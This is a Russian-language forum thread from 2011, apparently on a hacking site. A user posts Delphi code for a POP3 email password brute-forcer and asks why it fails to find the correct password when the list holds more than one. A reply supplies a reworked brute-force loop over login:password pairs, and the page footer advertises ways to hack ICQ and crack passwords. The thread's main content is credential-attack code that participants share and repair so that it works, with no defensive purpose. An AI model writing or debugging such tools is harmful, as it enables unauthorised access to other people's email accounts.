Старый 06.09.2011, 13:25   #1
Gdasar
RAM 2MB
 
Аватар для Gdasar
 
Регистрация: 10.03.2011
Сообщений: 3
Gdasar Новичок
Gdasar вне форума

По умолчанию В чем ошибка?


Здравствуйте форумчане...
Помогите мне разобраться в чем ошибка в программе(бруте для мыла)...
Значит так,прога когда брутит выдает не правильные результаты,а именно:
в списке логинов все правильно,а вот если пароли например 456367(не верный)будет стоять первым,а 5467547(верный) стоит вторым,то прога выводит что правильного пароля нет(как так?) а если пароль в списке один,то программа работает корректно
вот сам код:
Цитата:
procedure TForm1.button2Click(Sender: TObject);
var
LoginStrings, PassStrings: TStrings;
i, j:Integer;
begin
LoginStrings:=TStringList.Create;
PassStrings:=TStringList.Create;
LoginStrings.LoadFromFile(NameEdit.Text);
PassStrings.LoadFromFile(PassEdit.Text) ;
idp.Host := ServerNameEdit.Text;
idp.Port := StrToInt(PortEdit.Text);
for i:=0 to LoginStrings.Count-1 do
for j:=0 to PassStrings.Count-1 do
begin
idp.Username := LoginStrings.Strings[i];
idp.Password := PassStrings.Strings[j];
try
idp.Connect;
except
end;
if idp.Connected then
begin
Application.MessageBox(PChar('Имя:'+LoginStrings.S trings[i]+
'Пароль:'+PassStrings.Strings[j]),'Пароль найден');
end
else
begin
Application.MessageBox(PChar('Пароль не найден...'), 'Пароль не найден');
end;
idp.Disconnect;
Exit;
end;
end;



Подскажите что неправильно!

Добавлено через 4 минуты 9 секунд
Вот сам брут [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Последний раз редактировалось Gdasar; 06.09.2011 в 14:10. Причина: Добавлено сообщение
Ответ: В чем ошибка?
Старый 06.09.2011, 14:19   #2
O'NeiLL
RAM 256MB
 
Аватар для O'NeiLL
 
Регистрация: 04.11.2010
Сообщений: 968
O'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордится
O'NeiLL вне форума
По умолчанию Ответ: В чем ошибка?

вот только не надо ворошить чужие исходники [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.](пост 135) взял так и скажи?
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: В чем ошибка?
Старый 06.09.2011, 14:30   #3
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: В чем ошибка?

Неохото сейчас вникать но первое что бросилось в глаза, зачем не сколько стринг листов, это распрастраненная ошибка новичков, сам когдато ее допускал.
Лучше так.
Код:
Sourse := TstringList.Create;
Sourse.LoadFromFile('Blabla');
Sourse.NamesValueSeperator := ':'; //Разделитель соурс листа.
Sours.Names[i] //Логин
Sours.ValueFomIndex[i] //Пароль
Так будет проще.
Зы немного не понятен тввой код я о двух циклах.
Я бы зделал так.

Код:
Procedure Brutto;
var
    sch : integer;
   Sourse : TstringList;
begin
sch := 0;
      //Тут код для наст. поп сервера, порта и.т.д
Sourse.LoadFromFile(NameEdit.Text);
     While sch <  Sourse.Count - 1 do
                   begin
                       idp.UserName := Sourse.Names[sch];
                       idp.Password  := Sourse.Password[sch];
                           if idp.Connect then
                                   begin
                                        ShowMessage('Сбрутили!!');
                                   end
                                   else
                                         begin
                                             ShowMessage('Нек сбрутили');
                                         end;
                           idp.Disconnect;
                     inc(sch);
                   end;
end;
  Ответить с цитированием
Ответ: В чем ошибка?
Старый 06.09.2011, 14:57   #4
Resilved
RAM 4mb
 
Аватар для Resilved
 
Регистрация: 10.04.2011
Сообщений: 7
Resilved Новичок
Resilved вне форума
По умолчанию Ответ: В чем ошибка?

Цитата:
вот только не надо ворошить чужие исходники отсюда(пост 135) взял так и скажи?
ИМХО они и выложены в паблик, что бы их ворошили
  Ответить с цитированием
Ответ: В чем ошибка?
Старый 06.09.2011, 15:47   #5
Gdasar
RAM 2MB
 
Аватар для Gdasar
 
Регистрация: 10.03.2011
Сообщений: 3
Gdasar Новичок
Gdasar вне форума
По умолчанию Ответ: В чем ошибка?

O'NeiLL Разуй глаза!!! Этот исходник лично мой(я его написал понял)...
mironich Спасибо огромное...
  Ответить с цитированием
Ответ: В чем ошибка?
Старый 11.01.2012, 23:56   #6
j002e3
Юзверь
 
Аватар для j002e3
 
Регистрация: 11.01.2012
Сообщений: 1
j002e3 Новичок
j002e3 вне форума
По умолчанию Ответ: В чем ошибка?

up
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot